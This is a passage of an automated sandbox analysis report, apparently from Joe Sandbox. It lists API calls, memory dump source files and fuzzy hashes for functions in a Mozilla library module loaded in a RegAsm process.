                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C6DEA76
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(-00000001,?,?,6C6E1999), ref: 6C6DEA9D
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C6E1999), ref: 6C6DEAC2
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C6DEADC
                                                                                                                                                                                                                                                    • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C6DEB0B
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C6DEB27
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 706364981-0
                                                                                                                                                                                                                                                    • Opcode ID: 60f710cfde813755934514befa1bac0a4682f0649bf4a94f54de042e6ff95a7b
                                                                                                                                                                                                                                                    • Instruction ID: aba6d328e2eff0bec95803f41ebf5cd61c75e2f276c32b4858ff07ccfe1ce973
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60f710cfde813755934514befa1bac0a4682f0649bf4a94f54de042e6ff95a7b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B441F9B1A002169FDB14CF68CC84AAEB7B4FF45358F290664E825DB794E730E904C7D5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,6C6DB61E,?,?,?,?,?,00000000), ref: 6C6DB6AC
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C6DB61E,?,?,?,?,?,00000000), ref: 6C6DB6D1
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C6DB61E,?,?,?,?,?,00000000), ref: 6C6DB6E3
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C6DB61E,?,?,?,?,?,00000000), ref: 6C6DB70B
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C6DB61E,?,?,?,?,?,00000000), ref: 6C6DB71D
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C6DB61E), ref: 6C6DB73F
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C6DB61E,?,?,?,?,?,00000000), ref: 6C6DB760
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C6DB61E,?,?,?,?,?,00000000), ref: 6C6DB79A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1394714614-0
                                                                                                                                                                                                                                                    • Opcode ID: fbb184ccc9443bb41fda517d3ff1c7f1bb4fab80bc12c67f45ccc5dedafbaf2a
                                                                                                                                                                                                                                                    • Instruction ID: 8abc56cd470829f0a32395a6a50452b899f5e4f0c7d1d37a375188b13091faf2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbb184ccc9443bb41fda517d3ff1c7f1bb4fab80bc12c67f45ccc5dedafbaf2a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D941B3B2D001159FCB04DF68DC846AEB7B5FB85324F260629E825E7784E731AD0487E9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(6C755104), ref: 6C6DEFAC
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6DEFD7
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6DEFEC
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C6DF00C
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6DF02E
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?), ref: 6C6DF041
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6DF065
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE ref: 6C6DF072
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1148890222-0
                                                                                                                                                                                                                                                    • Opcode ID: 174b4154797b402fb653aa2904472e4e9bfcccf7a2290e27e3089a67d69e44d7
                                                                                                                                                                                                                                                    • Instruction ID: 01e3b0d58119acc03a4ebde78f927fa051ada936924f779ffc63d9e932f3b045
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 174b4154797b402fb653aa2904472e4e9bfcccf7a2290e27e3089a67d69e44d7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 664107F1A002059FCB08CF68DC949BE7769BF89318B254228E815DB794EB31E905C7E6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C74B5B9
                                                                                                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C74B5C5
                                                                                                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C74B5DA
                                                                                                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C74B5F4
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C74B605
                                                                                                                                                                                                                                                    • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C74B61F
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C74B631
                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C74B655
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1276798925-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70FA80: GetCurrentThreadId.KERNEL32 ref: 6C70FA8D
                                                                                                                                                                                                                                                      • Part of subcall function 6C70FA80: AcquireSRWLockExclusive.KERNEL32(6C75F448,?,6C70FA1F,?,?,6C6E5407), ref: 6C70FA99
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C716727
                                                                                                                                                                                                                                                    • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C7167C8
                                                                                                                                                                                                                                                      • Part of subcall function 6C724290: memcpy.VCRUNTIME140(?,?,?,:rl,?,:rl,00000001,?,6C723AED,?,00000001), ref: 6C7242C4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                                                                                                    • String ID: data$vul
                                                                                                                                                                                                                                                    • API String ID: 511789754-1154025971
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C6DEB57,?,?,?,?,?,?,?,?,?), ref: 6C70D652
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C6DEB57,?), ref: 6C70D660
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C6DEB57,?), ref: 6C70D673
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C70D888
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                                                                                                    • String ID: Wml$|Enabled
                                                                                                                                                                                                                                                    • API String ID: 4142949111-2265074722
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,6C737ABE), ref: 6C6E985B
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C737ABE), ref: 6C6E98A8
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000020), ref: 6C6E9909
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000023,?,?), ref: 6C6E9918
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C6E9975
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1281542009-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C72CC83,?,?,?,?,?,?,?,?,?,6C72BCAE,?,?,6C71DC2C), ref: 6C6EB7E6
                                                                                                                                                                                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C72CC83,?,?,?,?,?,?,?,?,?,6C72BCAE,?,?,6C71DC2C), ref: 6C6EB80C
                                                                                                                                                                                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C72CC83,?,?,?,?,?,?,?,?,?,6C72BCAE), ref: 6C6EB88E
                                                                                                                                                                                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C72CC83,?,?,?,?,?,?,?,?,?,6C72BCAE,?,?,6C71DC2C), ref: 6C6EB896
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 922945588-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C721D0F
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,6C721BE3,?,?,6C721D96,00000000), ref: 6C721D18
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,6C721BE3,?,?,6C721D96,00000000), ref: 6C721D4C
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C721DB7
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C721DC0
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C721DDA
                                                                                                                                                                                                                                                      • Part of subcall function 6C721EF0: GetCurrentThreadId.KERNEL32 ref: 6C721F03
                                                                                                                                                                                                                                                      • Part of subcall function 6C721EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C721DF2,00000000,00000000), ref: 6C721F0C
                                                                                                                                                                                                                                                      • Part of subcall function 6C721EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C721F20
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C721DF4
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1880959753-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75E220,?,?,?,?,6C6E3899,?), ref: 6C6E38B2
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75E220,?,?,?,6C6E3899,?), ref: 6C6E38C3
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,6C6E3899,?), ref: 6C6E38F1
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6E3920
                                                                                                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C6E3899,?), ref: 6C6E392F
                                                                                                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C6E3899,?), ref: 6C6E3943
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C6E396E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3047341122-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7184F3
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C71850A
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C71851E
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C71855B
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C71856F
                                                                                                                                                                                                                                                    • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7185AC
                                                                                                                                                                                                                                                      • Part of subcall function 6C717670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C71767F
                                                                                                                                                                                                                                                      • Part of subcall function 6C717670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C717693
                                                                                                                                                                                                                                                      • Part of subcall function 6C717670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7176A7
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7185B2
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6F5EDB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: memset.VCRUNTIME140(ewsl,000000E5,?), ref: 6C6F5F27
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6F5FB2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2666944752-0
                                                                                                                                                                                                                                                    • Opcode ID: d234fb5924dd097c740330ffb8b384822012a3a0f2dda40647277bfb18ae0bee
                                                                                                                                                                                                                                                    • Instruction ID: a91a87331424a4899109b673e687abe2e5c84e70449386408e3b654fbf608133
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d234fb5924dd097c740330ffb8b384822012a3a0f2dda40647277bfb18ae0bee
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 382189742046018FDB14DF29C988A6AB7B5EF8430DF29483DE59B87B41EF31E948CB55
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C6E1699
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E16CB
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E16D7
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E16DE
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E16E5
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E16EC
                                                                                                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6E16F9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 375572348-0
